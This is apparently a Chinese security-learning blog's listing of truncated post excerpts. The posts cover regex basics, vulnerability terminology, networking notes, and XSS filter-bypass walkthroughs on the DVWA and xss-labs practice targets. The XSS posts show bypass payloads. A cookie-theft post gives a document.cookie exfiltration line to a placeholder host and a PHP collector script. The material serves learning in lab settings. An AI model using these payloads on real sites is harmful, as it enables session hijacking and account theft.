正则表达式初学
正则表达式初学正则表达式在线测试工具:https://regex101.com/
常用限定符?
前面的字符出现0次或1次
*
前面的字符出现包括0次的任意次
+
前面的字符出现一次以上
{ }
精确匹配
例:
{6}:前面的字符出现6次
{3,6}: 前面的字符出现3到6次
{3,}: 前面的字符出现3次以上
原子组我的理解是配合限定符修饰使用。
原子即不可分割,限定符的限定作用对对应的一个原子组生效。
如
(ab){3,6}
这里原子组为(a,b),限定符为{3,6} 匹配连续出现一次及以上的“ab”
如:ab、ababab、ababab…….
常见原子组:一、用括号括起来的部分
(ab)
(cat|dog) 表示匹配cat或者dog 注:a(cat|dog){3}这里的限定符{3}只对(cat|dog)作限制。
…诸如此类
二、用方括号括起来的部分方括号括起来的部分表示字符的范围
[abc] :要求匹配的字符只能取自于a、b、c其中任意一个
[a-z]:表示匹配小写字母(从a到z)
[a-zA-Z1-9]:表示匹配大小写字母和数字
在方括号 ...
安全术语
安全术语
漏洞利用术语POC
POC(Proof of Concept):概念验证,用于验证安全漏洞是否存在,能否被利用。
EXP
EXP(Exploit):漏洞利用,代表一段有漏洞利用价值的攻击代码或一个漏洞利用过程
Payload
Payload:攻击载荷,通常是指Exploit拿下目标之后,攻击者在目标机器上执行的定制代码或程序,包括执行系统命令、建立会话。
安全漏洞生命周期三个阶段:
漏洞被发现
漏洞信息被公布
漏洞具有官方补丁或修复方案
伴生出的概念:
0day,漏洞信息未公布时,此时利用EXP可以通杀。
1day,漏洞信息被公布,但漏洞没有官方的补丁或修复方案,此时利用EXP可以入侵大部分系统。
Nday,漏洞已经有补丁,此时利用EXP只能入侵还未及时修复的系统
CVE/CNVD
CVE(Common Vulnerabilities & Exposures): 通用漏洞披露,相当于全球漏洞的百科全书。
CNVD全称 国家信息安全漏洞共享平台,是一个国家网络安全漏洞库。收录的各类漏洞会被赋予CNVD编号。
Shell/Webshell
...
关于锚点注入的深入探讨
关于锚点注入的深入探讨问题描述dvwa靶场 high难度下的 dom型XSS关卡的解法很有意思
这关使用了锚点注入的方式,通过在URL后面添加#和script标签,就能使浏览器执行脚本
以下是chatGPT对锚点注入的解释:
锚点注入: 在URL的井号后面添加JavaScript脚本是一种称为“锚点注入”的技术,它可以实现在页面加载时执行JavaScript代码。但是,这种技术并不是所有浏览器都支持,而且也存在一些安全风险。
如果浏览器支持锚点注入,那么在URL的井号后面添加JavaScript脚本是可以运行的。例如,以下URL会在页面加载时弹出一个警告框:
1http://example.com/page.html#<script>alert('Hello, world!');</script>
但是,为了保证网站的安全性,大多数现代浏览器已经禁止了锚点注入这种技术。因此,不建议在URL中使用锚点注入来执行JavaScript代码,而应该使用更安全的方法,如在HTML文档中嵌入JavaScript代码或在外部JavaScript文件 ...
实用姿势总结
XSS实用绕过姿势总结1. 嵌套字符以应对字符删除型过滤如:xss-labs-master level7
此处直接删除了字符script和href
可以采用嵌套的方式绕过
hhrefref
sscriptcript
此时,只会删除掉特定的连续字符串,但是剩下的字符又会重新组合成这个字符串,达成绕过的目的。
2. 尝试使用锚点注入的方式绕过(不一定会成功)
锚点注入: 在URL的井号后面添加JavaScript脚本是一种称为“锚点注入”的技术,它可以实现在页面加载时执行JavaScript代码。但是,这种技术并不是所有浏览器都支持,而且也存在一些安全风险。
如果浏览器支持锚点注入,那么在URL的井号后面添加JavaScript脚本是可以运行的。例如,以下URL会在页面加载时弹出一个警告框:
1http://example.com/page.html#<script>alert('Hello, world!');</script>
但是,为了保证网站的安全性,大多数现代浏览器已经禁止了锚点注入这种技术。因此,不建议在URL中 ...
XSS的绕过姿势(四)
XSS的绕过姿势(四)本章重点挑xss-labs-master靶场里一些经典的例子探讨
level2 闭合文本框
查看网页源码:
12345<h2 align=center>没有找到和<script>alert(1)</script>相关的结果.</h2><form action=level2.php method=GET><input name=keyword value="<script>alert(1)</script>"><input type=submit name=submit value="搜索"/></form>
看的出来 回显的消息被转义了,但是搜索框里的内容还在,看来搜索框是有value属性的
换思路 提前闭合value属性
成功
level5 闭合文本框这一关把on开头的字符串全部替换成了 on_ 开头,script标签也替换成了scr_ipt标签
尝试大小写绕 ...
XSS的绕过姿势(三)
XSS的绕过姿势(三)本章提及的几种姿势将在dvwa靶场进行演示
存储型XSS的绕过姿势
URL:
1http://localhost:8081/dvwa/vulnerabilities/xss_s/
安全等级:Medium猜测与尝试存储型,注意到有两个文本框,一个是姓名,一个是评论消息。
可能只对评论信息做了过滤,名字通过前端限制了输入字长,但没做过滤。
尝试修改名字的限制长度,然后在名字的文本框发脚本。
改成100,然后痛快地写脚本
失败:
推测可能对script标签做了过滤,老套路,换img
成功
尝试以下在评论消息框发同样的脚本
失败
message直接没了……可能是过滤掉了尖括号
查看源码123456789101112131415161718192021222324<?phpif( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxMessage' ] );//返回去掉两边空格的字符串 $ ...
XSS的绕过姿势(二)
XSS的绕过姿势(二)本章提及的几种姿势将在dvwa靶场进行演示
文本框反射型XSS的绕过姿势安全的等级:Medium
URL:
1http://localhost:8081/dvwa/vulnerabilities/xss_r/?name=XXX#
猜测与尝试肯定有过滤,但不知道过滤了什么
先简单试试
1http://localhost:8081/dvwa/vulnerabilities/xss_r/?name=<script>alert(1)</script>#
回显的script标签消失了,可能是被过滤掉了。
猜测是黑名单过滤,先试试大小写绕过:
1http://localhost:8081/dvwa/vulnerabilities/xss_r/?name=<sCript>alert(1)</script>#
成功 推测是简单过滤掉了script标签。
php源码:
123456789101112131415<?phpheader ("X-XSS-Protection: 0");// Is the ...
XSS的绕过姿势(一)
xss的绕过姿势(一)本章提及的几种姿势将在dvwa靶场进行演示
下拉列表DOM型XSS的绕过姿势安全等级:Medium
URL:
1http://localhost:8081/dvwa/vulnerabilities/xss_d/?default=English
猜测与尝试注意到有下拉列表,且在URL中修改default=后面的值时能回显至页面的下拉列表中
例:
1http://localhost:8081/dvwa/vulnerabilities/xss_d/?default=xxxxxxxx
尝试提交payload
提交后发现default后面的值又变回English了
猜测是做了过滤,检测到尖括号或者关键词就替换回 English
查看源代码
1234567891011121314<?php// Is there any input?if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) { ...
XSS盗取cookie
xss盗取cookiecookie概念
cookie是在http协议下,由web服务器保存在用户客户端上的小文本文件,常包含有关用户的信息
盗取cookie关键代码1document.location='http://ip/cookie.php?cookie='+document.cookie
cookie.php代码:
1234<?php$cookie=$_GET['cookie'];file_put_contents('cookie.txt',$cookie);?>
但是……在实操时遇到了点问题我在WWW根目录下新建了个文件夹cookieCatch,在里面写了一个cookie.php,新建了个cookie.txt放弹回来的cookie。
然而,我在url上添加这串payload并回车时,什么事也没有发生……(在dvwa靶场进行测试,已确定安全等级为low,没做过滤)
在文本框输入这串payload时,确实重定向到我写的php页面了。
但是打开cookie.txt只看到这些。。。。
啊?
我觉得可 ...
数据链路层
第三章 数据链路层
本章主要内容
点对点信道和广播信道的特点,以及对应协议(ppp)(CSMA/CD)的特点
三个基本问题:封装成帧、透明传输、差错检测
以太网mac层的硬件地址
适配器、转发器、集线器、网桥、以太网交换机的作用以及使用场合。
3.1 数据链路层的几个共同问题链路:
从一个节点到相邻结点的一段物理线路,中间无其他交换结点。
数据链路:
物理线路以及实现一些必要的通信协议的硬件和软件
1. 封装成帧给一段数据前后分别加上首部和尾部,便于接收端从比特流中辨认帧的开始和结束位置
2. 透明传输无论什么样的比特组合的数据,都能按照原样没有差错地通过数据链路层
也就是说:如果数据中出现了和帧界定符一样的比特组合时,就要采取有效的措施来解决这个问题。
3. 差错检测传输过程会出现差错(比特差错)难以避免。若判定有差错,那就简单地丢弃这个帧。
3.2 点对点协议PPP点对点协议:
PPP (Point-to-Point Protocol)
ppp协议的特点
互联网用户只有连接某个ISP才能接入互联网。PPP协议就是用户计算机和ISP进行通信时所使用的 数据链路层 协议 ...